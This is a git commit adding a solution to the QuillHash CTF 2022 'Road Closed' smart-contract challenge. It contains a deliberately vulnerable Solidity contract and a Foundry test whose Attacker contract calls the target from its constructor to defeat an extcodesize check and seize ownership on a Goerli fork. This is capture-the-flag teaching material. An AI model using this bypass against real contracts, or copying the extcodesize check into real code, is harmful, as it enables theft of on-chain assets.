Add solution for QuillHash CTF 2022 - Challenge minaminao#1 (minaminao#5)

PraneshASP · web-flow · commit 7bd318f2a027 · 2023-01-10T09:25:06.000+09:00
diff --git a/foundry.toml b/foundry.toml
@@ -6,5 +6,5 @@ ffi = true
 match_path = "*/*.t.sol"
 no_match_path = '*/_*'
 fs_permissions = [{ access = "read", path = "./out" }]
-
+ 
 # See more config options https://github.com/foundry-rs/foundry/tree/master/config
diff --git a/lib/forge-std b/lib/forge-std
@@ -1 +1 @@
-Subproject commit cd7d533f9a0ee0ec02ad81e0a8f262bc4203c653
+Subproject commit 53331f4cb2e313466f72440f3e73af048c454d02
diff --git a/lib/openzeppelin-contracts b/lib/openzeppelin-contracts
@@ -1 +1 @@
-Subproject commit d5ca39e9a264ddcadd5742484b6d391ae1647a10
+Subproject commit a81b0d0b2136a0cca6029048be25c4e2bb230d49
diff --git a/src/QuillCTF2022/README.md b/src/QuillCTF2022/README.md
@@ -0,0 +1,27 @@
+# QuillHash CTF 2022 Solutions
+
+Here's the link to the challenges page: https://quillctf.super.site/challenges. I highly recommend to solve the problems before checking the solutions!
+
+---
+
+**Table of Contents**
+- [Road Closed](#road-closed)
+- [Confidential Hash](#confidential-hash)
+- [VIP Bank](#vip-bank)
+- [SafeNFT](#safe-nft)
+- [d31eg4t3](#d31eg4t3) 
+
+---
+
+## Road closed:
+https://quillctf.super.site/challenges/quillctf-challenges/road-closed
+
+**Objective**:
+- Become the owner of the contract
+- Change the value of hacked to true
+
+Goerli link: https://goerli.etherscan.io/address/0xd2372eb76c559586be0745914e9538c17878e812
+ 
+```
+forge test --match-contract QuillCTF1Solved -vvvv
+```
diff --git a/src/QuillCTF2022/RoadClosed/QuillCTF1Solved.t.sol b/src/QuillCTF2022/RoadClosed/QuillCTF1Solved.t.sol
@@ -0,0 +1,49 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+import "forge-std/Test.sol";
+
+/// ./challenge/RoadClosed.sol
+
+/// Define the interface for the Target contract
+interface ITarget {
+    function addToWhitelist(address addr) external;
+
+    function changeOwner(address addr) external;
+
+    function pwn(address addr) external payable;
+
+    function pwn() external payable;
+
+    function isHacked() external view returns (bool);
+
+    function isOwner() external view returns (bool);
+}
+
+/// Define the attacker contract
+contract Attacker {
+    /// Calling the functions from a contract's constructor will bypasses the `extcodesize > 0` check
+    constructor(address target) {
+        ITarget(target).addToWhitelist(address(this));
+        ITarget(target).changeOwner(address(this));
+        ITarget(target).pwn(address(this));
+    }
+}
+
+contract QuillCTF1Solved is Test {
+    ITarget _target = ITarget(0xD2372EB76C559586bE0745914e9538C17878E812);
+    Attacker _attacker;
+
+    /// Run the test against the goerli testnet fork
+    function setUp() public {
+        vm.createSelectFork("https://rpc.ankr.com/eth_goerli");
+        _attacker = new Attacker(address(_target));
+    }
+
+    /// Exploit! Validate if owner == attacker's address
+    function test_exploit() external {
+        assertEq(_target.isHacked(), true);
+        vm.prank(address(_attacker));
+        assertEq(_target.isOwner(), true);
+    }
+}
diff --git a/src/QuillCTF2022/RoadClosed/challenge/RoadClosed.sol b/src/QuillCTF2022/RoadClosed/challenge/RoadClosed.sol
@@ -0,0 +1,57 @@
+// SPDX-License-Identifier: GPL-3.0
+
+pragma solidity 0.8.7;
+
+contract RoadClosed {
+    bool hacked;
+    address owner;
+    address pwner;
+    mapping(address => bool) whitelistedMinters;
+
+    function isContract(address addr) public view returns (bool) {
+        uint256 size;
+        assembly {
+            size := extcodesize(addr)
+        }
+        return size > 0;
+    }
+
+    function isOwner() public view returns (bool) {
+        if (msg.sender == owner) {
+            return true;
+        } else return false;
+    }
+
+    constructor() {
+        owner = msg.sender;
+    }
+
+    function addToWhitelist(address addr) public {
+        require(msg.sender == addr, "address must be msg.sender");
+        require(!isContract(addr), "Contracts are not allowed");
+        whitelistedMinters[addr] = true;
+    }
+
+    function changeOwner(address addr) public {
+        require(whitelistedMinters[addr], "You are not whitelisted");
+        require(msg.sender == addr, "address must be msg.sender");
+        require(addr != address(0), "Zero address");
+        owner = addr;
+    }
+
+    function pwn(address addr) external payable {
+        require(!isContract(msg.sender), "Contracts are not allowed");
+        require(msg.sender == addr, "address must be msg.sender");
+        require(msg.sender == owner, "Must be owner");
+        hacked = true;
+    }
+
+    function pwn() external payable {
+        require(msg.sender == pwner);
+        hacked = true;
+    }
+
+    function isHacked() public view returns (bool) {
+        return hacked;
+    }
+}
